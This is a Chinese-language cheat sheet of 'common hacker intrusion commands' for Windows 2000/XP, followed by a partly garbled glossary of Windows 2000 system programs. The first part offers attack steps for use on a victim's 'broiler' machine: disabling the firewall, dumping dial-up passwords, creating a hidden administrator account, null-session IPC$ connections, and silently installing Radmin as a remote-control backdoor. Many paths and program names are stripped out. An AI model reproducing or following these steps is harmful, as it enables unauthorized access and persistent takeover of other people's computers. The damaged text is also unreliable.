黑客常用入侵命令

黑客常用入侵命令

控制面版：运行>>>>>>>>>>>:control

计算机管理：command MMC

结束XP防火墙进程:net stop sharedaccess

查看ADSL帐号密码的代码:dialupass /allusers /stext "c:

启动3389服务：net start TermService

关闭所有防火墙的代码: /c net stop sharedaccess

iis命令重启:iisreset /reboot

用CMD命令实现路由跟踪:tracert 域名(如：)

结束进程：NET SHARE

查看版本：ver

查看中端(服务）：net start

查看文件：dir

查看3389：

加用户：c:winntsystem32>net user adminserver$ admin /add

提权限：net localgroup administrators adminserver$ /add

211.38.172.2 2180

查看用户net user

远程连接到主机CMD命令：telnet 主机IP

踢人：logoff ID

查看当前人：query user

打开telnet:net start telnet

telnet连接工具：OpenTelnet

删除共享： net share c$=c:

删除共享： net share c$ /del

启用GUEST：net user guest /active:yes

为GUEST设密码：net user guest 888888

提升到管理员：net localgroup "Administrators" guest /add

超级用户隐藏器:c:door adminserver$:admin

克隆帐号：ca IP 你建立的帐号 密码 肉机默认帐号 密码

ca 127.0.0.1 adminserver$ admin adminserver admin

完全禁止系统模认工享

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerMyComputerNameSpaceDelegateFolders{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------

中修改[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]

c:winntsystem32copy

c:winntsystem32cd..

c:winntsc 127.0.0.1 config Alerter binpath= c:

端口转向：f: "c: -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:

net use 对方IPipc$ "" /user:"administrator"

(在上传文件的目录下)远程复制文件:

c:radmin>net use a-01ipc$ "12345" /user:administrator

c:ramdin>copy r_ a-01admin$system32

c:ramdin>copy a-01admin$sytem32

在对方CMD下：

c:winntsystem32>regedit /s

c:winntsystem32>r_ /install /silenec

net start r_server

copy r_ 对方IPadmin$system32

c: IP ADMINISTRATOR "" 0 90

copy 文件名 IPadmin$system32

进入对方CMD:

c: Ip administrator "" 0 90

登陆CMD:

c:telnet IP 90

安装RADMIN:

c:winntsystem32

r_server /install silence

c:winntsystem32

r-server

导入注册表:

c: /s

看端口:

c:winntsystem32

netstat -an

改端口:

c:winntsystem32

r_ /port:1024 /pass:1234 /save /silence

起动服务:

c:winntsystem32net start r_server

隐藏文件:

c: +h r_ +h

%systemroot$system32

看看共享开了没有,没有的话把共享开开

c:winntsystem32>net share

清单是空的。

c:winntsystem32>net share ipc$

命令成功完成。

c:winntsystem32>net share admin$

命令成功完成。

注册表运行命令

regedit

查看端口：netstat-n

SA传送文件TFTP

先在本机开tftp服务 sqlexec

tftp-i IP get c:

2000命令集---------------------------------

win2000命令集 > accessibility wizard for walking you through setting up your

machine for your mobility needs. 辅助工具向导

> acs setup dcom server executable

> direct show setup tool 直接显示安装工具

> allows programs to open data in specified directories as if they were in the

current directory. 允许程序打开制定目录中的数据

> network display and modify ip - hardware addresses 显示和更改计算机的ip与硬件物理地址的对应列表

> at is a scheduling utility also included with unix 计划运行任务

> displays statistics for atm call manager. atm调用管理器统计

> display and modify attributes for files and folders 显示和更改文件和文件夹属性

> used to check and repair windows file systems 检测修复文件系统

> automates the file system conversion during reboots 在启动过程中自动转化系统

> automates the file format process during reboots 在启动过程中格式化进程

> used for formatting long file names 使用长文件名格式

> boot acceptance application for registry

> , a program included in windows 2000 that notifies the system that

startup was successful. can be run on a local or remote computer. 通报启动成功

> displays or modifies access control lists (acls) of files. 显示和编辑acl

> windows calculators 计算器

> windows cd player cd播放器

> change { user | port | logon } 与终端服务器相关的查询

> character map 字符映射表

> same as using "change logon" 启动或停用会话记录

> same as using "change port" 改变端口（终端服务）

> same as using "change user" 改变用户（终端服务）

> check the hard disk for errors similar to scandisk 3 stages must specify a drive

letter 磁盘检测程序

> same as using chkdsk but for ntfs ntfs磁盘检测程序

> component of ci filer service 组成ci文档服务

> displays or alters the encryption of directories [files] on ntfs partitions. 在ntfs上显示或改变加密的文件或目录

> content index -- it's the content indexing service for i 索引内容

> convertor 变换

> disk cleanup, popular with windows 98 磁盘清理

> sql server client network utility sql客户网络工具

> clipboard viewer for local will allow you to connect to other clipboards 剪贴簿查看器

> start the clipboard server 运行clipboard服务

> clspack used to create a file listing of system packages 建立系统文件列表清单

> display a cluster in a domain 显示域的集群

_cmd_.exe > famous command prompt 没什么好说的！

> connection manager auto-download 自动下载连接管理

> connection manager 连接管理器

> connection manager monitor 连接管理器监视

> connection manager profile manager 连接管理器配置文件安装程序

> about cluster server 集群

> comclust add, remove, or join a cluster. 比较两个文件和文件集的内容＊

> displays or alters the compression of files on ntfs partitions. 显示或改变ntfs分区上文件的压缩状态

> console ime ime控制台

> starts the control panel 控制面板

> convert file system to ntfs 转换文件系统到ntfs

> converts ms iis log files 转换iis日志文件格式到ncsa格式

> copy profiles 转换显示模式

> ms windows s host version 5.1 较本宿主版本

> client server runtime process 客户服务器runtime进程

> comma separated variable import/export utility 日至格式转换程序

> 和terminal server相关

> display the current dcom configuration. dcom配置属性

> ?

> promote a domain controller to adsi ad安装向导

> display dde shares on local or remote computer dde共享

>

> runs debug, a program testing and editing tool. 就是debug啦！

> defrag fat file system fat分区磁盘碎片整理程序

> defrag ntfs file system ntfs分区磁盘碎片整理程序

dfs_cmd_.exe > configures a dfs tree 配置一个dfs树

> distributed file system initialization 分布式文件系统初始化

> distributed file system server 分布式文件系统服务器

> ms cabinet maker 制作cab文件

> starts physical disk performance counters 磁盘性能计数器

> dllhost is used on all versions of windows 2000. dllhost is the hedost process for

all com+ applications. 所有com+应用软件的主进程

>

> disk manager service 磁盘管理服务

> part of disk management 磁盘管理服务的一部分

> dns applications dns

> recalls windows command lines and creates macros 命令行创建宏

> dos extender dos扩展

> direct play helper 直接运行帮助

> dr watson for 2000 fault detector 华生医生错误检测

> dr watson for 2000 viewer and configuration manager 华生医生显示和配置管理

> installs mdtc

> windows 2000 dvd player dvd播放

> direct-x diagnostics direct-x诊断工具

> line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）

> line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）

> ms database utility ms数据库工具

> private character editor ture type造字程序

> windows 2000 event viewer 事件查看器

evnt_cmd_.exe > event to trap translator; configuration tool

> event to trap translator setup

> converts exe to binary format 转换exe文件到二进制

> expand files that have been compressed 解压缩

> cab file extraction utility 解cab工具

> fastopen tracks the of files on a hard disk and stores the information in memory

for fast access. 快速访问在内存中的硬盘文件

> fax cover page editor 传真封面编辑

> display fax queue 显示传真队列

> fax wizard for sending faxes 发送传真向导

> starts fax server 启动传真服务

> compares two files or sets of files and their differences 比较两个文件的不同

> searches for a text string in file or files 查找文件中的文本行

> searches for strings in files 查找文件中的行

> fingers a user and displays statistics on that user finger一个用户并显示出统计结果

> fix mapi files 修复mapi文件

> enable or disable temporally directories 允许或者禁用临时文件目录

> display fonts in a font file 显示字体文件中的字体

> forces a file to start in dos mode. 强制文件在dos模式下运行

> popular windows game 空当接龙

> file transfer protocol used to transfer files over a network connection 就是ftp了

> graphic device interface 图形界面驱动

>

> program manager group convertor 转换程序管理员组

> displays help for windows 2000 commands 显示帮助

> display hostname for machine. 显示机器的hostname

> ie5 user install tool ie5用户安装工具

> customize folder wizard 自定义文件夹向导

> create and setup packages for install 穿件安装包

> restart iis admin service 重启iis服务

> keyboard language indicator applet 键盘语言指示器

> windows 2000 ip configuration. 察看ip配置

> ip security monitor ip安全监视器

> ipx routing and source routing control program ipx路由和源路由控制程序

> setup ftp for wireless communication 无线连接

> intersite messaging service 安装或者删除service control manager中的服务

> microsoft debugger for 4的调试器

> convert a jet engine database 转换jet engine数据库

> compact jet database. 压缩jet数据库

> command-line loader for 的命令行装载者

> core component for windows 2000 2000的核心组件

> change label for drives 改变驱动器的卷标

> license compliance wizard for local or remote systems. 许可证符合向导

> ldif cmd line manager ldif目录交换命令行管理

> terminal server license manager 终端服务许可协议管理

> display connection status lights 显示连接状况

> windows 2000 license manager 2000许可协议管理

> start the license server 启动许可协议服务器

>

> rpc locator 远程定位

> load perfmon counters 调用性能计数

> log current user off. 注销用户

> displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务

> send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。

> lsa executable and server dll 运行lsa和server的dll

> specifies the new dns domain for the default server 指定默认server新的dns域

> used for managing macfiles 管理macfiles

> used to magnify the current screen 放大镜

> ms cabinet maker 制作cab文件

> machine debug manager 机器调试管理

> display current memory stats 显示内存状态

> migrate passwords. 迁移密码

> microsoft management console 控制台

> netmeeting remote desktop sharing netmeeting远程桌面共享

> manage synchronization. 同步目录管理器

> creates, s, or lists a volume mount point. 创建、删除或列出卷的装入点。

> ms media player 媒体播放器

> multiple provider notification application 多提供者通知应用程序

>

> ms message queue backup and restore utility 信息队列备份和恢复工具

> msmq exchange connector setup 信息队列交换连接设置

> msmq migration utility 信息队列迁移工具

> ?

> multicast routing using snmp 使用snmp多点传送路由

> installs mscd (ms cd extensions) 安装mscd

> dynamic transaction controller console 动态事务处理控制台

> send a message to a user local or remote. 发送消息到本地或远程客户

> html application host html应用程序主机

> starts windows installer program 开始windows安装程序

> microsoft paint 画板

>

> task schedule program 任务计划表程序

> task scheduler setup 任务计划表安装

> program will allow you to have a narrator for reading. microsoft讲述人

> displays protocol stats and current tcp/ip connections using nbt 使用 nbt（tcp/ip

上的 netbios）显示协议统计和当前 tcp/ip 连接。

> ndde api server side ndde api服务器端

> net utility 详细用法看/？

> net utility d version from ms net的升级版

> network dde will install itself into the background 安装自己到后台

> creates a shell for network information 用于配置和监控 windows 2000 命令行脚本接口。

> displays current connections. 显示协议统计和当前的 tcp/ip 网络连接。

> loads country-specific information 加载特定国家（地区）的信息。windows 2000

和 ms-dos 子系统不使用该命令。接受该命令只是为了与 ms-dos 文件兼容。

> opens windows 2000 notepad 记事本

> displays information for dns 该诊断工具显示来自域名系统 (dns) 名称服务器的信息。

> opens the nt backup utility 备份和故障修复工具

> starts windows help utility 帮助

> performs db maintenance of the adsi 完成adsi的db的维护

> nt file replication service nt文件复制服务

>

> kernel patch 核心补丁

> core nt kernel kt的核心

>

> simulates a 16-bit windows environment 模拟16位windows环境

> netware redirector netware转向器

> runs netware s 运行netware脚本

> odbc 32-bit administrator 32位odbc管理

> configure odbc driver's and data source's from command line 命令行配置odbc驱动和数据源

> an os/2 warp server (os2 /o) os/2

> an os/2 warp server os/2

> an os/2 warp server os/2

> on screen keyboard 屏幕键盘

> windows 2000 packager manager 对象包装程序

> combination of ping and tracert 包含ping和tracert的程序

> is a posix program and path names used as arguments must be specified in posix

format. use "//c/users/default" instead of "c:usersdefault." 启动便携式存档互换 (pax) 实用程序

> used to check the pentium for the floating point division error. 检查pentium的浮点错误

> starts windows performance monitor 性能监视器

> packet internet groper 验证与远程计算机的连接

> used for backward compatibility with unix 用于兼容unix

> cmd line used to print files 打印文本文件或显示打印队列的内容。

> program manager 程序管理器

> profile quota program

> posix subsystem application posix子系统应用程序

> displays the available application terminal servers on the network

在网络上显示终端服务器可用的程序

> display information about processes local or remote 在本地或远程显示进程的信息（需终端服务）

> query termserver user process and sessions 查询进程和对话

> display information about a user logged on 显示用户登陆的信息（需终端服务）

> display information about terminal sessions. 显示终端服务的信息

> start the remote access admin service 启动远程访问服务

> creates a ras connection 建立一个ras连接

> dial a connection 拨号连接

> starts a ras connection 运行ras连接

> copies a file from and to a rcp service. 在 windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

> rdpclip allows you to copy and paste files between a terminal session and client

console session. 再终端和本地复制和粘贴文件

> recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。

> starts the redirector service 运行重定向服务

> 32-bit register service 32位注册服务

> modify registry permissions from within a 用脚本修改注册许可

> register a program so it can have special execution characteristics. 注册包含特殊运行字符的程序

>

> registers and unregister's dll's. as to how and where it register's them i dont

know. 注册和反注册dll

> options to tune debug options for applications failing to dump trace statements

trace 设置

> registration wizard 注册向导

>

> replace files 用源目录中的同名文件替换目标目录中的文件。

> reset an active section 重置活动部分

> runs commands on remote hosts running the rexec service. 在运行 rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 tcp/ip 协议后才可以使用该命令。

> starts the remote installation service wizard. 运行远程安装向导服务

> display or edit the current routing tables. 控制网络路由表

> no longer supported 不再支持了！

> router software that runs either on a dedicated dos or on an os/2 system. route软件在 dos或者是os/2系统

> runs commands on remote hosts running the rsh service 在运行 rsh 服务的远程计算机上运行命令

> mounts and configures remote system media 配置远程系统媒体

> remote storage notification recall 远程存储通知回显

> resource reservation protocol 源预约协议

> run a program as another user 允许用户用其他权限运行指定的工具和程序

> launches a 32-bit dll program 启动32位dll程序

> causes a program to run during startup 运行程序再开始菜单中

> reset the session subsystem hardware and software to known initial values 重置会话子系统硬件和软件到最初的值

> does not write to e: 不写入中

> smart card resource management server 子能卡资源管理服务器

> it will read the schema files (.ldf files) and upgrade the schema. (part of adsi) 读取计划更新文件和更新计划

> starts security editor help 自动安全性配置管理

> controls all the services 控制所有服务

> set high contrast - changes colours and display mode logoff to set it back to normal

设置高对比

> shows the software publishing state key values 显示软件发布的国家语言

> gui box prompts you to goto control panel to configure system components 安装程序（转到控制面板）

> set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本号

> system file checker test and check system files for integrity 系统文件检查

> print services for macintosh 打印macintosh服务

>

>

> monitor another terminal services session. 监控另外一台中端服务器会话

> windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与 ms-dos

文件兼容

>

> create and share folders 建立和共享文件夹

> file signature verification 文件签名验证

> serial keys utility 序列号制作工具

> performance logs and alerts 性能日志和警报

>

> starts the windows sound recorder 录音机

> display the current volume information 显示声音控制信息

> simple network management protocol used for network mangement 简单网络管理协议

> utility used with snmp snmp工具

> windows solitaire game 纸牌

> compares files and folders 读取输入、排序数据并将结果写到屏幕、文件和其他设备上

> part of the spooler service for printing 打印池服务的一部分

>

> starts the windows server manager 服务器管理器

> wdm stillimage- > monitor

> wdm stillimage- > service

> associates a path with a drive letter 将路径与驱动器盘符关联

> is a generic host process name for services that are run from

dynamic-link libraries (dlls). dll得主进程

> creates windows briefcase. 创建windows文件包

> opens editor for 4 system files 系统配置编辑器

> encrypt and secure system database nt账号数据库按群工具

> windows 2000 setup 2000安装程序

> starts the systray in the lower right corner. 在低权限运行systray

> task manager 任务管理器

> starts the windows 2000 task manager 任务管理器

> telephony client wizard 电话服务客户安装

> tcp services tcp服务

.exe > telnet utility used to connect to telnet server

> terminal server 终端服务

> trivial ftp 将文件传输到正在运行 tftp 服务的远程计算机或从正在运行 tftp 服务的远程计算机传输文件

> trivial ftp daemon

> change windows themes 桌面主题

> telnet server administrator telnet服务管理

> display the current telnet sessions 显示目前的telnet会话

> start the telnet server 开始telnet服务

> trace a route to display paths 该诊断实用程序将包含不同生存时间 (ttl) 值的

internet 控制消息协议 (icmp) 回显数据包发送到目标，以决定到达目标采用的路由

> terminal server administrator 终端服务管理器

> attaches a user session to a terminal session. 粘贴用户会话到终端对话

> disconnect a user from a terminal session 断开终端服务的用户

> kill a terminal server process 杀掉终端服务

> used with terminal server to query results. 用终端服务得出查询结果

> shutdown the system 关闭系统

> part of performance monitoring 性能监视器的一部分

> upgrade a jet database 升级jet数据库

> ups service ups服务

> core windows service windows核心服务

> part of the winlogon process winlogon进程的一部分

> start the windows user manager for domains 域用户管理器

> this tool enables an administrator to designate which computers automatically

open accessibility tools when windows 2000 starts. 指定2000启动时自动打开那台机器

> driver verifier manager driver verifier manager

> loads ipx/spx vdm 调用ipx/spx vdm

> windows time server 时间服务器

> used to extract windows files 解压缩windows文件

> opens windows chat 打开windows聊天